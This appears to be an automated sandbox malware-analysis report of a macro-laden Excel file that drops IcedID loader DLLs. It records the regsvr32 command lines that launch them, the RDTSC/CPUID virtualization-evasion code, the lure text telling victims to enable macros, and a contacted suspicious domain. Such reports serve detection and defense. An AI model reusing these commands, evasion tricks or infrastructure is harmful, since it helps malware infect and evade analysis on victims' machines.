        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

        E-Banking Fraud:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 956, type: MEMORY

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D1678 NtQuerySystemInformation,4_2_002D1678
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D18104_2_002D1810
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB15D04_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB41BF4_2_000007FEF8FB41BF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
        Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.2d0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2089120426.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$LL52387-01-F4448869.xlsmJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC6E7.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: LL52387-01-F4448869.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: LL52387-01-F4448869.xlsmInitial sample: OLE zip file path = xl/media/image1.png
        Source: LL52387-01-F4448869.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: LL52387-01-F4448869.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: XTOWN.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D1E50 4_2_002D1E50
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000002D1E71 second address: 00000000002D1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000002D1EAB second address: 00000000002D1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D2434 rdtsc 4_2_002D2434
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_002D27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D2434 rdtsc 4_2_002D2434

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002D22DC LookupAccountNameW,4_2_002D22DC

        Stealing of Sensitive Information:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 956, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 956, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting1Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
